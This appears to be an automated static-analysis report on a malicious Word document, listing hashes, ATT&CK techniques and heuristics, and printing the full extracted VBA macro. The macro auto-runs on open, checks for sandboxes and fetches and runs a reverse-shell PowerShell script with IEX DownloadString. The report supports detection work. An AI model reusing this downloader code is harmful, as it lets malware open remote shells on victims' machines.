Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a06c470c1e64ae83…

MALICIOUS

Office (OOXML)

18.1 KB Created: 2021-06-01 08:31:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-06-04
MD5: df3e711e5fa993f513191f2afe56b147 SHA-1: 98b268a54f087966c53bae66a94fca7c8bf99da8 SHA-256: a06c470c1e64ae83b724a3b5fd1340cf17d33642df3be52951a4f9037ba516bb
230 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1071.001 Web Protocols

The sample contains VBA macros that utilize WScript.Shell and CreateObject to execute obfuscated commands. The AutoOpen macro is designed to run automatically upon opening the document, and it attempts to download and execute a second-stage payload from a URL embedded within the obfuscated shell command. This indicates a downloader or droppper functionality.

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      mouse_event MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0
      Set objShell = CreateObject("Wscript.shell")
      objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + "  IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')"
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
      mouse_event MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0
      Set objShell = CreateObject("Wscript.shell")
      objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + "  IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      mouse_event MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0
      Set objShell = CreateObject("Wscript.shell")
      objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + "  IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://192.168.2.120/reverse_shell_120_4444.ps1 Referenced by macro
    • http://1�92.168.PReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3836 bytes
SHA-256: cadf3fea78baac22efaac97cf230dca0f5bb27a3939febb97244327df25bf9f2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Public Declare PtrSafe Function SetCursorPos Lib "user32" (ByVal x As Long, ByVal y As Long) As Long
Public Declare PtrSafe Sub mouse_event Lib "user32" (ByVal dwFlags As Long, ByVal dx As Long, ByVal dy As Long, ByVal cButtons As Long, ByVal dwExtraInfo As Long)
Public Const MOUSEEVENTF_LEFTDOWN = &H2
Public Const MOUSEEVENTF_LEFTUP = &H4
Public Const MOUSEEVENTF_RIGHTDOWN As Long = &H8
Public Const MOUSEEVENTF_RIGHTUP As Long = &H10
'Declare sleep
Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Public Declare PtrSafe Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
 
Sub AutoOpen()

Do While IsSandBoxiePresent(1) = True

Loop

Shello

End Sub

Sub msg()
 MsgBox ("Your are in VM ...")
End Sub
 
 Function IsvirtualboxPresent(ByVal OptionToCheck As Integer) As Boolean
   Select Case OptionToCheck
       Case 1  'Recomendado
           Dim hSbie As Long
 
           hSbie = GetModuleHandle("vmcheck.dll")
           If hSbie <> 0 Then
               IsvirtualboxPresent = True
           Else
               IsvirtualboxPresent = False
           End If
       Case 2  'No recomendado
           If InStr(MainFrm.Caption, "[#]") <> 0 Then
               IsvirtualboxPresent = True
           Else
               IsvirtualboxPresent = False
           End If
   End Select
End Function
 
 
 
 
 
 Function IsvmwarePresent(ByVal OptionToCheck As Integer) As Boolean
   Select Case OptionToCheck
       Case 1  'Recomendado
           Dim hSbie As Long
 
           hSbie = GetModuleHandle("dbghelp.dll")
           If hSbie <> 0 Then
               IsvmwarePresent = True
           Else
               IsvmwarePresent = False
           End If
       Case 2  'No recomendado
           If InStr(MainFrm.Caption, "[#]") <> 0 Then
               IsvmwarePresent = True
           Else
               IsvmwarePresent = False
           End If
   End Select
End Function
 
 
 
 
Function IsSandBoxiePresent(ByVal OptionToCheck As Integer) As Boolean
   Select Case OptionToCheck
       Case 1  'Recomendado
           Dim hSbie As Long
 
           hSbie = GetModuleHandle("SbieDll.dll")
           If hSbie <> 0 Then
               IsSandBoxiePresent = True
           Else
               IsSandBoxiePresent = False
           End If
       Case 2  'No recomendado
           If InStr(MainFrm.Caption, "[#]") <> 0 Then
               IsSandBoxiePresent = True
           Else
               IsSandBoxiePresent = False
           End If
   End Select
End Function

Private Sub LeftClick()
  mouse_event MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0
  Sleep 50
  mouse_event MOUSEEVENTF_LEFTUP, 0, 0, 0, 0
End Sub
Private Sub RightClick()
  mouse_event MOUSEEVENTF_RIGHTDOWN, 0, 0, 0, 0
  Sleep 50
  mouse_event MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0
End Sub


Sub Shello()

  mouse_event MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0
  Sleep 50
  mouse_event MOUSEEVENTF_LEFTUP, 0, 0, 0, 0
  mouse_event MOUSEEVENTF_RIGHTDOWN, 0, 0, 0, 0
  Sleep 50
  mouse_event MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0
  Set objShell = CreateObject("Wscript.shell")
  objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + "  IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')"

End Sub
Sub SomeSub()
    End
    'Code will not execute
    Debug.Print "SomeSub: Hello after Exit Sub!"
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 15872 bytes
SHA-256: 3699897bc29d412c8381b82ef3c92dcffe1f564420d7c20443d4ae63117f1688